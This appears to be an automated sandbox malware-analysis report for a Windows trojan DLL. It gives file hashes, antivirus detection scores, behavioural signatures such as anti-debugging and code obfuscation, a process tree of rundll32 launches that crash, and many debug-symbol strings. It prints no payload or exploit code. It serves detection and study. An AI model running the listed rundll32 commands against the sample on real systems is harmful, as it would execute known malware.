
Windows Analysis Report SecuriteInfo.com.Trojan.Agent.FHBA.20741.16185

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Agent.FHBA.20741.16185 (renamed file extension from 16185 to dll)
Analysis ID: 483798
MD5: 4b59be3cef04547514828f8c6443ae20
SHA1: bed0d3a622ca55a914ceaf885ebc2fb419e8a9eb
SHA256: b7ca395f51df95bd3d5b5b4a30a5c2381a9893f0d66aff011d605319d5c0ea7d
Tags: dll

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Uses 32bit PE files
One or more processes crash
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3668 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5444 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2564 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1752 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 804 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 2036 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 804 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll Avira: detected
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll Virustotal: Detection: 62%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll Metadefender: Detection: 29%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll ReversingLabs: Detection: 75%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, RELOCS_STRIPPED
Source: WerFault.exe, 00000009.00000002.301167220.00000000051D3000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300504231.0000000004A8D000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.317002782.0000000004B47000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 0000000A.00000002.301075274.0000000004B73000.00000004.00000001.sdmp | String found in binary or memory: https://watson.telemetry.mSg
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | Virustotal: Detection: 62%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | Metadefender: Detection: 29%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | ReversingLabs: Detection: 75%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 804
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 804
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2564
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2036
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1752
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E8A.tmp
Source: classification engine | Classification label: mal56.winDLL@12/12@0/1
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 identical entries in the report)
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: msacm32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msvfw32.pdbL source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: msvfw32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb7 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.250625291.00000000052FD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250652039.0000000000C54000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.260648787.0000000004C2B000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbCa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: avicap32.pdbF source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.251728422.0000000000C4E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.263422997.0000000000B8E000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb/ source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: winmm.pdbpt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: msacm32.pdb% source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbht source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: mscms.pdbT source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbXt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250660218.0000000000C5A000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.262553693.0000000000B9A000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb- source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb8 source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ODBC32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdbbt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb[ source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdbQa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbua source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbb source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb8t6 source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb> source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mpr.pdbZ source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rtm.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbY source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbY source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbu source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.251452448.0000000003516000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250652039.0000000000C54000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.260239602.0000000000B94000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb$t: source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: dpapi.pdbnt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb" source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb@ source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdby source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb' source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb|t source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbIa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb; source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbk source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.251871969.0000000003510000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.251728422.0000000000C4E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.263422997.0000000000B8E000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdby source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb]a source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
